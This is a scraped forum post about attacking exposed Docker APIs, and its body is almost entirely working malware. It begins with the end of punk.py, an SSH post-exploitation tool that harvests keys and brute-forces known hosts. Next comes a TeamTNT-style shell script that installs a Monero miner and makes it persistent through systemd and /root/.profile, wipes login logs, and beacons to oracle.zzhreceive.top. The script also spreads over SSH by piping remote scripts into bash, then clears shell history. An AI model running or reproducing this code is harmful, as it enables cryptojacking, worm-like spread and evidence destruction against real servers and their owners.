					sys.stdout.write ("\033[93m[!]\033[0m Encrypted known host at \033[93m%s/.ssh/known_hosts\033[0m\n" % args.home )
					sys.stdout.write ("\033[93m[!]\033[0m Run with \033[93m%s--crack\033[0m flag to break it\n")

				elif encrypted_knownhosts and args.crack != "":
					# crack the hashed known hosts
					sys.stdout.write ("\033[92m[*]\033[0m Cracking known hosts on \033[92m%s/.ssh/known_hosts...\033[0m\n" % args.home )
					open(args.home+homes + "/.ssh/known_hosts")
					for host in FK:
						if host.find("|") >= 0:
							crack_obj = crack_host(host, args.crack, args.threads)
							crack_obj.run()

				FK.close()
	
	return True

# Avoid ipaddress library since is not supported in python2 
# https://stackoverflow.com/a/41386874
def inet_atoi(ipv4_str):
    """Convert dotted ipv4 string to int"""
    # note: use socket for packed binary then struct to unpack
    return struct.unpack("!I", socket.inet_aton(ipv4_str))[0]

def inet_itoa(ipv4_int):
    """Convert int to dotted ipv4 string"""
    # note: use struct to pack then socket to string
    return socket.inet_ntoa(struct.pack("!I", ipv4_int))

def ipv4_range(ipaddr):
    """Return a list of IPv4 address contianed in a cidr address range"""
    # split out for example 192.168.1.1:22/24
    ipv4_str, port_str, cidr_str = re.match(
        r'([\d\.]+)(:\d+)?(/\d+)?', ipaddr).groups()

    # convert as needed
    ipv4_int = inet_atoi(ipv4_str)
    port_str = port_str or ''
    cidr_str = cidr_str or ''
    cidr_int = int(cidr_str[1:]) if cidr_str else 0

    # mask ipv4
    ipv4_base = ipv4_int & (0xffffffff << (32 - cidr_int))

    # generate list
    addrs = [inet_itoa(ipv4_base + val)
        for val in range(1 << (32 - cidr_int) + 2)]
    return addrs


if __name__ == "__main__":

	sys.stdout.write ("""\033[92m
             |
         \   |   /
    .     \  |  /    .
     `-.__|\/_\/|_.-'
   .__  \ /     `./  
      `-        @|
     .-'`.  !!    -   \033[90m-=[ \033[93mpunk.py - unix SSH post-exploitation 1337 tool\033[92m
    '     `  !  __.'  \033[90m-=[ \033[93mby `r3vn` ( tw: @r3vnn )\033[92m
          _)___(      \033[90m-=[ \033[93mhttps://xfiltrated.com\033[92m
        \n\033[0m""")


	parser = argparse.ArgumentParser()
	parser.add_argument('--home', help='custom home path',default="/home/")
	parser.add_argument('--run','-r', help='run commands on compromised hosts',default="")
	parser.add_argument('--no-passwd', dest='passwd', action='store_false', default=True, help='skip passwd check')
	parser.add_argument('--crack','-c', help='crack hashed known_hosts files',default="",metavar='subnet')
	parser.add_argument('--threads','-t', type=int, help='brute-focing threads',default=4)
	args = parser.parse_args()

	sys.stdout.write ("\033[92m[*]\033[0m enumerating valid users with ssh keys...\n")
	discovery(args)
	sys.stdout.write ("\033[92m[*]\033[0m Done.\n")

	if len(sshKeys) <= 0:
		sys.stdout.write ("\033[93m[!]\033[0m No valid SSH keys found on the system.\n")
		sys.exit()
	else:
		sys.stdout.write ("\033[92m[*]\033[0m SSH keys found:\n\033[92m\n")

		for key in sshKeys:
			sys.stdout.write ("\t" + key + "\n")

	if len(users) <= 0:
		sys.stdout.write ("\n\033[93m[!]\033[0m No valid users found on the system.\n")
		sys.exit()
	else:
		sys.stdout.write ("\n\033[92m[*]\033[0m Users found:\n\033[92m\n")

		for user in users:
			sys.stdout.write ("\t" + user + "\n" )#+ " :: " + targets[user]

	if len(knownHosts) <= 0:
		sys.stdout.write ("\n\033[93m[!]\033[0m No valid known hosts found on the system.\n")
		sys.exit()

	else:
		sys.stdout.write ("\n\033[92m[*]\033[0m known hosts found:\n\033[92m\n")

		for host in knownHosts:
			sys.stdout.write ("\t"+ host+ "\n")

	sys.stdout.write ("\n\033[92m[*]\033[0m Starting keys bruteforcing...\n")
	Attack = attack(args.run, args.threads)

	Attack.run()
	sys.stdout.write ("\033[92m[*]\033[0m Attack Complete!\n")



		

' | base64 -d > /usr/bin/pu; chmod +x /usr/bin/pu

fi

}


function checksshkeys(){

if [ -f /usr/share/[crypto].log ]; then

curl  http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

cur http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

cd1 http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

TNTcurl http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptostart >>/dev/null

else 

curl  http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

cur http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

cd1 http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

TNTcurl http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

wget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

wge -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

wd1 -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/cryptonotfount >>/dev/null

fi

cat /home/hilde/.ssh/authorized_keys|grep root@puppetserver >/dev/null

if (test $? -ne 0); then

curl  http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

cur http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

cd1 http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

TNTcurl http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailed >>/dev/null

else

curl  http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

cur http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

cd1 http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

TNTcurl http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

wget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

wge -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authok >>/dev/null

fi


cat /root/.ssh/authorized_keys|grep root@puppetserver >/dev/null

if (test $? -ne 0); then

curl  http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

cur http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

cd1 http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

TNTcurl http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

wget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

wge -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authfailedroot >>/dev/null

else

curl  http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

cur http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

cd1 http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

TNTcurl http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

wget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

wge -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

wd1 -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

TNTwget -q -O- http://oracle.zzhreceive.top/b2f628/authokroot >>/dev/null

fi

}


function SetupMoneroOcean(){

function SetupMoneroOcean1(){

# printing intentions

echo "[*] Downloading MoneroOcean advanced version of xmrig to /tmp/xmrig.tar.gz"

if ! curl -L --progress-bar "$MOxmrigMOD" -o /tmp/xmrig.tar.gz; then

  echo "ERROR: Can't download $MOxmrigMOD file to /tmp/xmrig.tar.gz"

  exit 1

fi


echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"

[ -d $MOHOME/ ] || mkdir $MOHOME/

if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/; then

  echo "ERROR: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"

  exit 1

fi

rm /tmp/xmrig.tar.gz


echo "[*] Checking if advanced version of $MOHOME/xmrig works fine (and not removed by antivirus software)"

sed -i 's/"donate-level": *[^,]*,/"donate-level": 0,/' $MOHOME/[crypto].pid

$MOHOME/[crypto] --help >/dev/null

if (test $? -ne 0); then

  if [ -f $MOHOME/[crypto] ]; then

    echo "WARNING: Advanced version of $MOHOME/xmrig is not functional"

  else 

    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"

  fi


  echo "[*] Looking for the latest version of Monero miner"

  #LATEST_XMRIG_RELEASE=`curl -s https://github.com/xmrig/xmrig/releases/latest  | grep -o '".*"' | sed 's/"//g'`

  LATEST_XMRIG_LINUX_RELEASE=$MOxmrigSTOCK


  echo "[*] Downloading $LATEST_XMRIG_LINUX_RELEASE to /tmp/xmrig.tar.gz"

  if ! curl -L --progress-bar $LATEST_XMRIG_LINUX_RELEASE -o /tmp/xmrig.tar.gz; then

    echo "ERROR: Can't download $LATEST_XMRIG_LINUX_RELEASE file to /tmp/xmrig.tar.gz"

    exit 1

  fi


  echo "[*] Unpacking /tmp/xmrig.tar.gz to $MOHOME/"

  if ! tar xf /tmp/xmrig.tar.gz -C $MOHOME/ --strip=1; then

    echo "WARNING: Can't unpack /tmp/xmrig.tar.gz to $MOHOME/ directory"

  fi

  rm /tmp/xmrig.tar.gz


  echo "[*] Checking if stock version is OKAY!"

  sed -i 's/"donate-level": *[^,]*,/"donate-level": 0,/' $MOHOME/[crypto].pid

  $MOHOME/[crypto] --help >/dev/null

  if (test $? -ne 0); then 

    if [ -f $MOHOME/[crypto] ]; then

      echo "ERROR: Stock version of $MOHOME/[crypto] is not functional too"

    else 

      echo "ERROR: Stock version of $MOHOME/[crypto] was removed by antivirus too"

    fi

    exit 1

  fi

fi


echo "[*] $MOHOME/[crypto] is OK"

}


######################### printing greetings ###########################

clear

echo -e " "

echo -e "                                \e[1;34;49m___________                 _____________________________\033[0m"

echo -e "                                \e[1;34;49m\__    ___/___ _____    ____\__    ___/\      \__    ___/\033[0m"

echo -e "                                \e[1;34;49m  |    |_/ __ \\__  \  /     \|    |   /   |   \|    |   \033[0m"

echo -e "                                \e[1;34;49m  |    |\  ___/ / __ \|  Y Y  \    |  /    |    \    |   \033[0m"

echo -e "                                \e[1;34;49m  |____| \___  >____  /__|_|  /____|  \____|__  /____|   \033[0m"

echo -e "                                \e[1;34;49m             \/     \/      \/                \/         \033[0m"

echo -e " "

echo -e "                                ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "

echo -e " "

echo -e "                                \e[1;34;49m            Now you get, what i want to give... --- '''      \033[0m"

echo " "

echo " "




if [ "$(id -u)" == "0" ]; then

  echo "running as root... its all OKAY!"

else

  echo "running not as root... first starting tmp setup..."


fi



# checking prerequisites


if [ -z $WALLET ]; then

  echo "ERROR: wallet"

  exit 1

fi


WALLET_BASE=`echo $WALLET | cut -f1 -d"."`

if [ ${#WALLET_BASE} != 95 ]; then

  echo "ERROR: Wrong wallet base address length (should be 95): ${#WALLET_BASE}"

  exit 1

fi


if [ -z $MOHOME ]; then

  echo "ERROR: Please define HOME environment variable to your home directory"

  exit 1

fi


if [ ! -d $MOHOME ]; then

  echo "ERROR: Please make sure HOME directory $MOHOME exists or set it yourself using this command:"

  echo '  export HOME=<dir>'

  exit 1

fi


if ! type curl >/dev/null; then

apt-get update --fix-missing 2>/dev/null 1>/dev/null

apt-get install -y curl 2>/dev/null 1>/dev/null

apt-get install -y --reinstall curl 2>/dev/null 1>/dev/null

yum clean all 2>/dev/null 1>/dev/null

yum install -y curl 2>/dev/null 1>/dev/null

yum reinstall -y curl 2>/dev/null 1>/dev/null

fi


sleep 2

$MOHOME/[crypto] --help >/dev/null

if (test $? -ne 0); then

    SetupMoneroOcean1

else

    echo "WARNING: Advanced version of $MOHOME/xmrig was removed by antivirus (or some other problem)"

fi


if [ -f "$MOHOME/[crypto].pid" ]

 then

         echo "config file exists, neednot backup"

 else

         echo "config file not exists.download from teamtnt"

         SetupMoneroOcean1

fi



if [ -f "$MOHOME/[crypto]" ]

 then

         echo "miner file exists"

 else

         curl -L --progress-bar $miner_url -o /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && mv $MOHOME/xmrig*/xmrig  $MOHOME/\[crypto\]

fi


if [ -f "$MOHOME/[crypto].pid" ]

then

    echo "miner config exists"

else

    curl -L --progress-bar $config_url -o  $MOHOME/\[crypto\].pid

fi


rm /tmp/xmrig.tar.gz


if [ -f "$MOHOME/[crypto]" ]

 then

         echo "miner file exists, neednot backup"

 else

         curl -L --progress-bar $miner_url_backup -o  /tmp/xmrig.tar.gz && tar -xf /tmp/xmrig.tar.gz -C $MOHOME/ && chmod +x $MOHOME/\[crypto\]

fi


rm /tmp/cf.tar



sed -i 's/"url": *"[^"]*",/"url": "xmr-asia1.nanopool.org:14444",/' $MOHOME/[crypto].pid

sed -i 's/"user": *"[^"]*",/"user": "'$WALLET'",/' $MOHOME/[crypto].pid

sed -i 's/"coin": *[^"]*,/"coin": "monero",/' $MOHOME/[crypto].pid

sed -i 's/"max-cpu-usage": *[^,]*,/"max-cpu-usage": 100,/' $MOHOME/[crypto].pid

sed -i 's#"log-file": *null,#"log-file": "'$MOHOME/[crypto].log'",#' $MOHOME/[crypto].pid

sed -i 's/"syslog": *[^,]*,/"syslog": true,/' $MOHOME/[crypto].pid


cp $MOHOME/[crypto].pid $MOHOME/config_background.json

sed -i 's/"background": *false,/"background": true,/' $MOHOME/config_background.json


# preparing script


echo "[*] Creating $MOHOME/[crypto].sh script"

cat >$MOHOME/[crypto].sh <<EOL

#!/bin/bash

if ! pidof [crypto] >/dev/null; then

  nice $MOHOME/[crypto] \$*

else

  echo "Monero miner is already running in the background. Refusing to run another one."

  echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."

fi

EOL


chmod +x $MOHOME/[crypto].sh


# preparing script background work and work under reboot


if ! sudo -n true 2>/dev/null; then

  if ! grep $MOHOME/[crypto].sh /root/.profile >/dev/null; then

    echo "[*] Adding $MOHOME/[crypto].sh script to /root/.profile"

    echo "$MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1" >>/root/.profile

  else 

    echo "Looks like $MOHOME/[crypto].sh script is already in the /root/.profile"

  fi

  echo "[*] Running crypto service in the background (see logs in $MOHOME/[crypto].log file)"

  /bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1

else


  if [[ $(grep MemTotal /proc/meminfo | awk '{print $2}') > 3500000 ]]; then

    echo "[*] Enabling huge pages"

    echo "vm.nr_hugepages=$((1168+$(nproc)))" | sudo tee -a /etc/sysctl.conf

    sudo sysctl -w vm.nr_hugepages=$((1168+$(nproc)))

  fi


  if ! type systemctl >/dev/null; then


    /bin/bash $MOHOME/[crypto].sh --config=$MOHOME/config_background.json >/dev/null 2>&1


  else


    echo "[*] Creating crypto systemd service"

    cat >/tmp/crypto.service <<EOL

[Unit]

Description=crypto system service


[Service]

ExecStart=$MOHOME/[crypto] --config=$MOHOME/[crypto].pid

Restart=always

Nice=10

CPUWeight=1


[Install]

WantedBy=multi-user.target

EOL

    sudo mv /tmp/crypto.service /etc/systemd/system/crypto.service

    echo "[*] Starting crypto systemd service"

    sudo killall [crypto] 2>/dev/null

    sudo systemctl daemon-reload

    sudo systemctl enable crypto.service

    sudo systemctl start crypto.service

  fi

fi


}


localgo() {

echo > /var/spool/mail/root

echo > /var/log/wtmp

echo > /var/log/secure

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o-  http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done

fi

if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then

  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o-  http://oracle.zzhreceive.top/b2f628/b.sh | bash >/dev/null 2>&1 &' & done

fi

}


KILLMININGSERVICES


SetupMoneroOcean


makesshaxx


checksshkeys


SecureTheSystem


FixTheSystem


if [ ! -f "/var/tmp/.alsp" ]; then

localgo

echo 'lockfile' > /var/tmp/.alsp

tntrecht +i /var/tmp/.alsp || chattr +i /var/tmp/.alsp

else

echo "replay .. i know this server ..."

exit

fi


echo ""

echo "[*] Setup complete"

curl -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash

cd1 -fsSL http://oracle.zzhreceive.top/b2f628fff19fda999999999/cronis.sh | bash

history -c


## now the bad part of the script###

提供企业建站服务,免费网防系统,提交信息登录 http://yundun.ddoss.cn 邮箱: proposal@ddoss.cn 
回复列表
默认   热门   正序   倒序

回复:docker api 漏洞入侵控制shell脚本

头像

用户名:

粉丝数:

签名:

资料 关注 好友 消息